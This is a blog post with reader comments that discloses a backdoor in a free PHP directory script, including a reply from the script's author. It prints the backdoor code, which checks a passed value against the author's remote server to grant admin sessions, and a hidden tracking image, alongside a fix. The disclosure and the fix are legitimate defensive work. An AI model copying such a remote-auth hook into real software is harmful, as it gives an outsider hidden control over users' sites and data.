Free Directory Software: Why Not Put in a few Programming Eggs?
Because it is pretty damn bogus.
[update: Javier has removed the database access egg from his script.]
Tons of new directories are springing up using the Free PHP Directory Script created by Javier García Esteban (of Directory-Search or Biz-Directory). While his download page states "the script runs without known bugs with PHP4 and MySQL3," the script also ran with known eggs put in the programming.
Anyone who puts eggs in their software so they can have backdoor access to anyone using it does not have the best intentions for their users.
The two eggs I have been told about are:
- on line 62 of install_4.php - sends a referer to his directory
<IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> - on line 60 of include.php (must scroll to the right) - allowed Javier database access
if ($pass) { $access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r"); $access = fread($access,4); if ($access == "true"){ session_start(); $HTTP_SESSION_VARS['admin'] = true; header("Location: {$dir}admin_edit.php"); }; };
The first egg is harmless. It only identifies new installations. The second egg gave Javier access to your database.
The eggs are not hard to remove from the directory script. If you have an old version of the script you may want to remove the eggs.
- You can replace the image in the first egg with your own image or just delete that line of code. That first egg really is no big deal.
- The second egg is complete crap. [added: The second egg gives Javier backdoor access to the script. After I posted this Javier stated that he removed that egg. It is a shame that it was ever there in the first place.]
To remove the second egg you need to remove that above part on line 60 (scroll way to the right) of include.php and replace it with:
if ($pass) {
$rand = md5(time());
$access = fopen ("p=$rand","r");
$access = fread($access,4);
if ($access == "true") {
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
};
};
(at least this is what I did)
I also changed my PHPmyAdmin panel login password after I changed the script. Javier stated that the password was never sent even when the egg was there...he just was using it for backdoor access...as he states in his comment below. He also stated the place which was sent the database access is now a 404 error.
Thanks to MarketingLady at V7N forums. More info about the Free PHP Directory Script Backdoor.
Comments
I'm appauled at the nature of this hack in which Javier added a backdoor entry. How can you trust ANYTHING this clown writes again?
I've posted his name on many forums, with links to this article, hopefully when poeple do a search for his name, the shitstorm he managed to create will render him incapable of finding another programming job again.
Good luck Javier, and suck on this!
There is no excuse for putting a backdoor.
This script SUCK.
Erase the database after i update so much info.
I also don't know how come?
sometime i have problem logging in. have to install the install_3.php again SUCK big time.
security cannot make it.
Seph,
How did the bots read the admin pages, and how could they delete categories.
Hi Shawn
From what I understand Seph stated that the best way to have security is to absolutely delete those to files and then to only FTP the other admin files to the server while you are using them and then delete them when you are done...Also backup your database often.
I have had no problems with the script, but I did remove the files that Seph recommended removing.
I have just uploaded a new copy of the script, and it looks like these problems I had mentioned above have been fixed.
Before you could enter a specific url into your browser and it would delete a category.....or even the database, no admin user and pass needed.
How did a bot get in there, I have no idea. but I have (or had) a log file that had over 1000 entries by a bot, and it went through, and deleted all links, and all categories.
This happened twice to me, as well as, the specific url to delete the database with no username and password happened three times.
Again, it seems it was fixed, but I no longer trust the srcipt regardless if it was fixed.
I just feel its sick and wrong...
I've just spent the last hour reconfiging my DB access for some 25 site.... ;-(
I can certainly understand why a coder might want to do this, to protect their intellectual rights.
However, it obviously does damage consumer confidence - after all, some of us pay to remove the footer link, but apparently even though the product license is purchased, the backdoor still exists.
I guess the problem is that once people are alerted to this issue, it's harder for him to keep tabs no the intellectual rights. In that regard, it would actually be a very difficult issue to find a suitable compromise between development and license purchaser.
This is why I code all my own stuff... or maybe I just like re-inventing the wheel.
What about intellectual rights has to do with sending himself database access information?
That is pretty shady, and I'm wondering what legitimate reason there would be for needing that information.
That's great that the fix for the eggs are here, but why not suggest using an alternate directory that doesn't have programming eggs? Are there no other good PHP directories available?
Likely there are some other good directory scripts out there...I mentioned the change for people who already installed the script and did not want to swap over.
Aaron, I love you but you're making a fuss out of nothing. Javier is Spanish, so it's most likely he's Catholic, and we all know catholics are good people who don't hack.
:)
something tells me you do not believe the letters you just typed there John?
I am Javier García, co-owner of Biz-Directory.org and programmer of the Free PHP Directory Script. Let me explain the things people are talking about.
First of all, we have removed the code the article talks about, we prefer not to have anoyed customers though we have to bear abuses from other people.
The invisible image was just that, an image, unable to hurt in any way. It allowed us to keep the records of installed scripts. It was more convenient than requesting the installation url every time the script was downloaded/installed.
Regarding the backdoor, it was password-protected, so it is impossible nobody but us can access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this code.
Something people is wrong about: the backdoor was not sending any personal data, of course not the password, nor other user information. The only parameter sent was the "pass" variable, not used in the script (not even in the installation, in addition the installation does not include "include.php" but "include_install.php"). It was the variable we should type in the querystring to enter the panel. Any programmer can tell this looking at the code.
Maybe including this code was not a lucky idea, but our intention was not to retrieve personal information. Just to allow us an entrance in case of abuse.
We are sorry about any inconvenience this could have caused, but we can assure no legal user of the script has anything to be afraid.
Regards
Javier García
Biz Directory
This has way too many holes and back doors in it.
You don't need to sign in to the admin control panel to:
Erase the database (happened to me 3 times)
Erase Categories (happened to me 2 times)
When a bot finds it way into the admin (which doesn't need the username & password) it will crawl all links and in turn delete every catyegory, and every link (happened twice).
I did enjot how this script worked, and the ease of setup, but security is totally dead.
Add new comment